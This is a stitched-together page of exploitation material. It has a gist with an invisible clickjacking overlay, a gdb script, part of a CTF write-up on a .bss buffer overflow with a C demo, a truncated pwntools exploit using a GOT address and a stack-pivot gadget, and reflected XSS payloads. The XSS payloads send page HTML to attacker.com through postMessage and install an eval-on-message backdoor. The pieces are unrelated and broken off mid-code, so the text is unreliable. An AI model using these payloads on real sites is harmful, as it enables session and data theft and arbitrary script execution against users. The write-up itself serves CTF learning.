@ancat
ancat / gist:11164179
Created April 22, 2014 03:09
"obfuscated" html
<style>
.like{
position:absolute;
-moz-transform: scale(2,1);
-webkit-transform: scale(2,1);
-ms-transform: scale(2,1);
opacity:.0;
top:18%;
left:27%;
}
</style>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>http://24.media.tumblr.com</title>
set $root = 0x804c36c
# first element
break *0x08049030
commands
silent
printf "allocated first_node->name @ 0x%x\n", $eax
continue
end
break *0x0804903D

Kendall

Kendall was a 300-point "red" (exploitation) challenge. It was a fairly involved challenge, but simple once you realized what you had to do. Launching the binary started a forking server for a DHCP Management Console.

After playing around with the console, it was clear that authenticating would be integral to solving the challenge. The authenticate function opens a password.txt file and compares its contents against your input. You could probably use the strcmp as a timing oracle to brute-force the password, but that's kind of lame.

While reversing, we noticed the same strange function being used to read user input everywhere. Strange, mostly because it only accepted a size parameter: it took no destination buffer and allocated none, and instead always wrote into the same statically sized 128-byte buffer in the .bss segment.
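To make concrete why a reader that takes only a size is dangerous, here is an added C example; it is not code from the writeup or from the challenge binary. It models the fixed 128-byte .bss buffer with a hypothetical struct (`bss_layout`, with a constructed `password` field placed directly after the buffer, standing in for whatever global happens to follow it), shows a reader that trusts the caller-supplied size beside one that clamps it to the buffer's capacity, and reports whether the neighbouring field was overwritten. The names, the layout and the sample values are assumptions for illustration only.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define INPUT_SIZE 128

/* Hypothetical stand-in for two adjacent .bss globals: the shared 128-byte
 * input buffer the writeup describes, followed by something sensitive.
 * Grouping them in one struct keeps the byte-wise write below defined in C
 * while still showing the spill into the neighbouring object. */
struct bss_layout {
    char input[INPUT_SIZE];
    char password[32];
};

typedef size_t (*reader_fn)(struct bss_layout *, const char *, size_t);

/* Vulnerable shape: copies up to `size` bytes of input into the fixed buffer
 * with no check against the buffer's real capacity. */
size_t read_input_unchecked(struct bss_layout *bss, const char *src, size_t size)
{
    char *dst = (char *)bss;           /* byte view starting at input[0] */
    size_t n = 0;
    while (n < size && src[n] != '\0') {
        dst[n] = src[n];               /* runs straight past input[] when size > 128 */
        n++;
    }
    return n;
}

/* Hardened shape: the caller's size is clamped to the destination's capacity,
 * leaving room for the terminator. */
size_t read_input_checked(struct bss_layout *bss, const char *src, size_t size)
{
    if (size >= INPUT_SIZE)
        size = INPUT_SIZE - 1;
    size_t n = 0;
    while (n < size && src[n] != '\0') {
        bss->input[n] = src[n];
        n++;
    }
    bss->input[n] = '\0';
    return n;
}

/* Drives one reader with an oversized input and reports whether the secret
 * next to the buffer was overwritten. Returns 1 if clobbered, 0 if intact. */
int password_clobbered(reader_fn reader, size_t requested_size)
{
    struct bss_layout bss;
    char attempt[INPUT_SIZE + 32];     /* constructed oversized input: all 'A' */

    memset(&bss, 0, sizeof bss);
    strcpy(bss.password, "hunter2");   /* constructed sample secret */
    memset(attempt, 'A', sizeof attempt - 1);
    attempt[sizeof attempt - 1] = '\0';

    if (requested_size > sizeof bss)   /* keep the demo inside the modelled object */
        requested_size = sizeof bss;
    reader(&bss, attempt, requested_size);
    return strcmp(bss.password, "hunter2") != 0;
}

int main(void)
{
    printf("unchecked reader, size 140: password clobbered = %d\n",
           password_clobbered(read_input_unchecked, 140));
    printf("checked reader,   size 140: password clobbered = %d\n",
           password_clobbered(read_input_checked, 140));
    return 0;
}
```

The defect is entirely in the API: once the destination is implicit and fixed, every caller that forwards a user-controlled or merely generous size becomes a write past the buffer, so the fix belongs inside the reader (clamp to the real capacity) rather than at each call site.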

from pwn import *
import struct
import sys

# pack a 32-bit value as little-endian (same as pwntools' p32)
lei = lambda x: struct.pack('<I', x)
stack_chk = 0x0804B01C  # address of the stack_chk entry in the GOT
ret = 0x08048D89  # stack pivot gadget (sub esp, 0x1c; pop; pop; pop; pop; ret)
live = True
if live:
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(document.body.innerHTML, '*')</script>
http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/" id="someframe"></iframe><script>document.getElementById('someframe').contentWindow.postMessage(document.body.innerHTML, '*')</script>
http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/"></iframe><script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(function() {var x=new XMLHttpRequest();x.open('GET','/other/page.html',false);x.send();return x.responseText}(), '*')</script>
<script>
var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow");
w.postMessage("window.opener.postMessage(document.body.innerHTML, '*')", "*");
</script>